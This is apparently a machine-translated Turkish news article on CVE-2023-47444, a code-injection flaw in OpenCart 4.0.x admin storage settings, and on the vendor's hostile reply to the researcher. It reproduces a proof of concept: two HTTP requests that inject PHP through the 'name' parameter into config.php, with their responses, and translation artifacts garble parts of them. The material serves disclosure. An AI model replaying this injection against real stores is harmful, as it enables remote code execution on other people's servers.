Güvenlik Araştırmacısı OpenCart’taki Güvenlik Açığı Açıkladı


Güvenlik araştırmacısı OpenCart'ın güvenlik açığını ortaya çıkarıyor;  şirket agresif tepki veriyor

” adı altında çalışan bir güvenlik araştırmacısı0xbroOpenCart’ta, config.php ve admin/config.php dosyalarına uzaktan kod yürütülmesine neden olabilecek rastgele güvenilmeyen verilerin yazılmasına izin veren bir Statik kod yerleştirme güvenlik açığı keşfetti.

Bu güvenlik açığına CVE-2023-47444 atandı ve önem derecesi 8,8 (Yüksek).

Ancak güvenlik araştırmacısından OpenCart’a sorumlu bir açıklama yapıldı ancak buna kibarca yanıt verilmedi. Daniel Kerr ismindeki yönetici, raporuna şu şekilde yanıt verdi:zamanını boşa harcayan sensin“.

CVE-2023-47444: OpenCart’ta Doğrulanmış Statik Kod Eklemeler

Bu güvenlik açığı, OpenCart’ın 4.0.0.0 ila 4.0.2.3 sürümlerinde mevcut olup, kimliği doğrulanmış bir kullanıcıya ortak/güvenlik olanağı sağlar.erişim” Ve “değiştirmek” config.php ve admin/config.php dosyalarına güvenilmeyen rastgele veriler yazma ayrıcalıkları, uzaktan kod yürütülmesine neden olabilir.

Bu güvenlik açığı, biri depolama klasörünü uygulama web kökünün dışına taşıyan, diğeri ise kurulumdan sonra gizli yönetici yolunu yeniden adlandıran iki işlevde mevcuttu.

Belge

Ücretsiz Web Semineri

Yaklaşan web seminerinde CTO Karthik Krishnamoorthy ve Indusface Ürün Başkan Yardımcısı Vivek Gopalan, API’lerin nasıl saldırıya uğrayabileceğini gösteriyor. Oturumda şunlar ele alınacak: OWASP API’nin en iyi 10 güvenlik açığından yararlanma, API’ye kaba kuvvetle hesap ele geçirme (ATO) saldırısı, API’ye DDoS saldırısı, WAAP’ın API ağ geçidi üzerinden güvenliği nasıl artırabileceği


Önkoşullar ve Kavram Kanıtı

Bu güvenlik açığından yararlanabilmek için tehdit aktörünün arka uç kontrol paneline yönelik geçerli kimlik bilgilerinin yanı sıra ortak/güvenlik konusunda yazılı izne sahip olması gerekir. Buna ek olarak admin/klasörünün varsayılan olması ve yeniden adlandırılmaması gerekir.

Kavram kanıtı (Kaynak: 0xbro)
Kavram kanıtı (Kaynak: 0xbro)

Bu güvenlik açığına ilişkin kavram kanıtına göre isteklerin iki yönde gönderilmesi gerekiyor.

  1. Route=common/security.storage&name=pwned’);phpinfo();%23&path=&user_token=
  2. Route=common/security.storage&name=pwned’);phpinfo();%23&path=&user_token=&sayfa=99

İlk İstek

GET /admin_secret/index.php?route=common/security.storage&name=pwned’);phpinfo();%23&path=/home/kali/Projects/OpenCart/4.0.2.3/&user_token=e5e8e0f6369ef124dd3d94d4d4e1d8ad HTTP/1.1Host: 127.0. 0.1:8888Çerez: OCSESSID=fbc47c7e5098550f0c12070be0
– CEVAP –
HTTP/1.1 200 Tamam
{“sonraki”:”http:\/\/127.0.0.1:8888\/admin_secret\/index.php?route=common\/security.storage&user_token=e5e8e0f6369ef124dd3d94d4d4e1d8ad&name=pwned’);phpinfo();#&path=\/ home\/kali\/Projeler\/OpenCart\/4.0.2.3\/&page=2″}

İkinci istek

GET /admin_secret/index.php?route=common/security.storage&name=pwned’);phpinfo();%23&path=/home/kali/Projects/OpenCart/4.0.2.3/&user_token=e5e8e0f6369ef124dd3d94d4d4e1d8ad&page=99 HTTP/1.1Host: 127.0.0.1:8888Çerez: OCSESSID=fbc47c7e5098550f0c12070be0
– CEVAP –
HTTP/1.1 200 Tamam
{“success”:”Başarılı: Depolama dizini taşındı!”}

OpenCart’tan gelen yanıta ek olarak yöneticiler GitHub’daki çekme isteğini de “güvenlik açığı olmayan” olarak belirterek kapattılar. Ancak düzeltme daha sonra ana sürümle birleştirildi.

Bu güvenlik açığı ve OpenCart yanıtı hakkında, kavram kanıtı ve diğer bilgiler hakkında ayrıntılı bilgi sağlayan eksiksiz bir rapor yayınlandı.

14 günlük ücretsiz deneme sürümünü deneyerek StorageGuard’ın depolama sistemlerinizdeki güvenlik kör noktalarını nasıl ortadan kaldırdığını deneyimleyin.



Source link